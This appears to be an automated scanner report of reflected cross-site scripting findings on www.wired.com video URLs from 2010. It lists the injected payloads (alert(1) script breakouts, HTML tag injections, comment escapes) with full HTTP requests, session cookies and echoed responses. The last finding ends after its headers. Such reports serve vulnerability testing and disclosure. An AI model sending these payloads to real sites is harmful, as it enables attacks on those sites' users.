The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a937"><a>62e50e68a4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights1a937"><a>62e50e68a4c/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:32 GMT Date: Mon, 22 Nov 2010 00:46:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights1a937"><a>62e50e68a4c"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9420"-alert(1)-"98c086f2364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsf9420"-alert(1)-"98c086f2364/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:37 GMT Date: Mon, 22 Nov 2010 00:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e96d"-alert(1)-"764235caa89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/17164405742e96d"-alert(1)-"764235caa89/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:50 GMT Date: Mon, 22 Nov 2010 00:47:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed62f"-alert(1)-"b13676a10a0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-boxed62f"-alert(1)-"b13676a10a0/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:59 GMT Date: Mon, 22 Nov 2010 00:47:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1450"-alert(1)-"c5b613f454c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001a1450"-alert(1)-"c5b613f454c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:09 GMT Date: Mon, 22 Nov 2010 00:48:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9df2e--><script>alert(1)</script>c0a6c52dd39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video9df2e--><script>alert(1)</script>c0a6c52dd39/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29470 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:50 GMT Date: Mon, 22 Nov 2010 00:42:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video9df2e--><script>alert(1)</script>c0a6c52dd39/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15f7a"><a>14ac02a74d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video15f7a"><a>14ac02a74d2/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29435 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:02 GMT Date: Mon, 22 Nov 2010 00:42:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video15f7a"><a>14ac02a74d2 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a284"><a>89e42bb26a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos1a284"><a>89e42bb26a2/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:47:50 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos1a284"><a>89e42bb26a2 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb0b5"-alert(1)-"46c49765a4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosfb0b5"-alert(1)-"46c49765a4b/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:04 GMT Date: Mon, 22 Nov 2010 00:44:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50103"-alert(1)-"8e2c93350c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights50103"-alert(1)-"8e2c93350c0/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:07 GMT Date: Mon, 22 Nov 2010 00:45:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d852"><a>c1b1288d9c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights2d852"><a>c1b1288d9c5/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:18 GMT Date: Mon, 22 Nov 2010 00:44:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights2d852"><a>c1b1288d9c5"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a337e"-alert(1)-"f1cf29d2aaf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574a337e"-alert(1)-"f1cf29d2aaf/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:50:23 GMT Date: Mon, 22 Nov 2010 00:45:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ipt type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2660b"-alert(1)-"2b0abda2f1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer2660b"-alert(1)-"2b0abda2f1/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:51 GMT Date: Mon, 22 Nov 2010 00:45:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ca1"-alert(1)-"587a42270 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/68025405500190ca1"-alert(1)-"587a42270 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:51:13 GMT Date: Mon, 22 Nov 2010 00:46:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6288f--><script>alert(1)</script>4d7dc58b639 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6288f--><script>alert(1)</script>4d7dc58b639/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29488 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:27 GMT Date: Mon, 22 Nov 2010 00:45:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6288f--><script>alert(1)</script>4d7dc58b639/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7fce"><a>4c58c684623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoa7fce"><a>4c58c684623/latest-videos/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29453 Vary: Accept-Encoding Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:49:43 GMT Date: Mon, 22 Nov 2010 00:44:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoa7fce"><a>4c58c684623 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 877c6"><a>f389d0665 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos877c6"><a>f389d0665/highlights/1716440574/noire-thriller-set-in-seedy-los-angeles-of-the-40s/672339556001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:50:23 GMT Date: Mon, 22 Nov 2010 00:45:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106815
